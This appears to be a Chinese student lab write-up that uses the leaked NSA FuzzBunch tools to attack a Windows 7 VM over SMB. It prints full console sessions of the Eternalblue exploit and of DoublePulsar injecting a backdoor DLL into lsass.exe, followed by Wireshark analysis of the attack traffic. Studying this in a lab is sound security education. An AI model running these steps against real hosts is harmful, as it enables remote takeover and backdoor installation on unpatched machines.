實驗一 Win7利用NSA的MS17-010漏洞利用工具攻擊Win7 64
阿新 • • 發佈:2022-01-24
IP查詢
首先查詢靶機和攻擊機的IP地址:
靶機:192.168.53.43
攻擊機:192.168.53.86
執行fb.py檔案實施Eternalblue攻擊
執行fb.py指令碼
指定攻擊目標和log目錄
[?] Default Target IP Address [] : 192.168.53.43 [?] Default Callback IP Address [] : 192.168.53.86 [?] Use Redirection [yes] : no [?] Base Log directory [D:\logs] : C:\logs [*] Checking C:\logs for projects Index Project ----- ------- 0 fbtest 1 test 2 testsmb 3 testsmb2 4 testsmb3 5 testsmb4 6 Create a New Project [?] Project [0] : 6 [?] New Project Name : yuxiaohan [?] Set target log directory to 'C:\logs\yuxiaohan\z192.168.53.43'? [Yes] : y [*] Initializing Global State [+] Set TargetIp => 192.168.53.43 [+] Set CallbackIp => 192.168.53.86 [!] Redirection OFF [+] Set LogDir => C:\logs\yuxiaohan\z192.168.53.43 [+] Set Project => yuxiaohan
發動Eternalblue攻擊
fb > use Eternalblue [!] Entering Plugin Context :: Eternalblue [*] Applying Global Variables [+] Set NetworkTimeout => 60 [+] Set TargetIp => 192.168.53.43 [*] Applying Session Parameters [*] Running Exploit Touches [!] Enter Prompt Mode :: Eternalblue Module: Eternalblue =================== Name Value ---- ----- NetworkTimeout 60 TargetIp 192.168.53.43 TargetPort 445 VerifyTarget True VerifyBackdoor True MaxExploitAttempts 3 GroomAllocations 12 Target WIN72K8R2 [!] plugin variables are valid [?] Prompt For Variable Settings? [Yes] : [*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout. [?] NetworkTimeout [60] : [*] TargetIp :: Target IP Address [?] TargetIp [192.168.53.43] : [*] TargetPort :: Port used by the SMB service for exploit connection [?] TargetPort [445] : [*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation. [?] VerifyTarget [True] : [*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts. [?] VerifyBackdoor [True] : [*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3. [?] MaxExploitAttempts [3] : [*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do. [?] GroomAllocations [12] : [*] Target :: Operating System, Service Pack, and Architecture of target OS 0) XP Windows XP 32-Bit All Service Packs *1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs [?] Target [1] : [!] Preparing to Execute Eternalblue [*] Mode :: Delivery mechanism *0) DANE Forward deployment via DARINGNEOPHYTE 1) FB Traditional deployment from within FUZZBUNCH [?] Mode [0] : 1 [+] Run Mode: FB [?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] : [*] Redirection OFF [+] Configure Plugin Local Tunnels [+] Local Tunnel - local-tunnel-1 [?] Destination IP [192.168.53.43] : [?] Destination Port [445] : [+] (TCP) Local 192.168.53.43:445 [+] Configure Plugin Remote Tunnels Module: Eternalblue =================== Name Value ---- ----- DaveProxyPort 0 NetworkTimeout 60 TargetIp 192.168.53.43 TargetPort 445 VerifyTarget True VerifyBackdoor True MaxExploitAttempts 3 GroomAllocations 12 ShellcodeBuffer Target WIN72K8R2 [?] Execute Plugin? [Yes] : [*] Executing Plugin [*] Connecting to target for exploitation. [+] Connection established for exploitation. [*] Pinging backdoor... [+] Backdoor returned code: 10 - Success! [+] Ping returned Target architecture: x64 (64-bit) [+] Backdoor is already installed -- nothing to be done. [*] CORE sent serialized output blob (2 bytes): 0x00000000 08 01 .. [*] Received output parameters from CORE [+] CORE terminated with status code 0x00000000 [+] Eternalblue Succeeded
使用Doublepulsar
fb Special (Eternalblue) > use Doublepulsar [!] Entering Plugin Context :: Doublepulsar [*] Applying Global Variables [+] Set NetworkTimeout => 60 [+] Set TargetIp => 192.168.53.43 [*] Applying Session Parameters [!] Enter Prompt Mode :: Doublepulsar Module: Doublepulsar ==================== Name Value ---- ----- NetworkTimeout 60 TargetIp 192.168.53.43 TargetPort 445 OutputFile Protocol SMB Architecture x86 Function OutputInstall [!] Plugin Variables are NOT Valid [?] Prompt For Variable Settings? [Yes] : [*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout. [?] NetworkTimeout [60] : [*] TargetIp :: Target IP Address [?] TargetIp [192.168.53.43] : [*] TargetPort :: Port used by the Double Pulsar back door [?] TargetPort [445] : [*] Protocol :: Protocol for the backdoor to speak *0) SMB Ring 0 SMB (TCP 445) backdoor 1) RDP Ring 0 RDP (TCP 3389) backdoor [?] Protocol [0] : [*] Architecture :: Architecture of the target OS *0) x86 x86 32-bits 1) x64 x64 64-bits [?] Architecture [0] : 1 [+] Set Architecture => x64 [*] Function :: Operation for backdoor to perform *0) OutputInstall Only output the install shellcode to a binary file on disk. 1) Ping Test for presence of backdoor 2) RunDLL Use an APC to inject a DLL into a user mode process. 3) RunShellcode Run raw shellcode 4) Uninstall Remove's backdoor from system [?] Function [0] : 2 [+] Set Function => RunDLL [*] DllPayload :: DLL to inject into user mode [?] DllPayload [] : [*] DllPayload :: DLL to inject into user mode [?] DllPayload [] : C:\yuxiaohan.dll [-] Error: Invalid value for 'DllPayload' (C:\yuxiaohan.dll) [*] DllPayload :: DLL to inject into user mode [?] DllPayload [] : C:\backdoor.dll [+] Set DllPayload => C:\backdoor.dll [*] DllOrdinal :: The exported ordinal number of the DLL being injected to call [?] DllOrdinal [1] : [*] ProcessName :: Name of process to inject into [?] ProcessName [lsass.exe] : [*] ProcessCommandLine :: Command line of process to inject into [?] ProcessCommandLine [] : [!] Preparing to Execute Doublepulsar [*] Redirection OFF [+] Configure Plugin Local Tunnels [+] Local Tunnel - local-tunnel-1 [?] Destination IP [192.168.53.43] : [?] Destination Port [445] : [+] (TCP) Local 192.168.53.43:445 [+] Configure Plugin Remote Tunnels Module: Doublepulsar ==================== Name Value ---- ----- NetworkTimeout 60 TargetIp 192.168.53.43 TargetPort 445 DllPayload C:\backdoor.dll DllOrdinal 1 ProcessName lsass.exe ProcessCommandLine Protocol SMB Architecture x64 Function RunDLL [?] Execute Plugin? [Yes] : [*] Executing Plugin [+] Selected Protocol SMB [.] Connecting to target... [+] Connected to target, pinging backdoor... [+] Backdoor returned code: 10 - Success! [+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x0614A5FC SMB Connection string is: Windows 7 Ultimate 7600 Target OS is: 7 x64 Target SP is: 0 [+] Backdoor installed [+] DLL built [.] Sending shellcode to inject DLL [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Command completed successfully [+] Doublepulsar Succeeded fb Payload (Doublepulsar) >
抓包分析
由於wireshark可以抓包的網絡卡介面要求,因此需要重新改變網路適配,設定成僅主機模式。
Vmnet1用於實現Host-only連線方式,這種方式下,虛擬主機會與真實主機在同一個虛擬私網中。真實主機在這個私網中使用Vmnet1網絡卡,而非真實的物理網絡卡,Vmware會有一個虛擬的不可見的交換機連線真實主機和各個使用Host-only方式的虛擬機器,這樣就組成一個小的虛擬區域網。
重複上述步驟,重新查詢並設定攻擊機與靶機IP即可
抓包如下:
追蹤TCP流,重組後更易觀察:
第三行給出主機名:T.E.S.T.-.P.C.
第六行給出主機系統及版本:W.i.n.d.o.w.s. .7. .U.l.t.i.m.a.t.e. .7.6.0.0...W.i.n.d.o.w.s. .7. .U.l.t.i.m.a.t.e.
第七行給出工作組名:6...1...W.O.R.K.G.R.O.U.P..
第七行也給出匿名共享管道開啟:.@....^.....3....1.9.2...1.6.8...2.3...1.2.9..I.P.C.$...?????.
第十行給出SMB協議版本:.#.SMB2..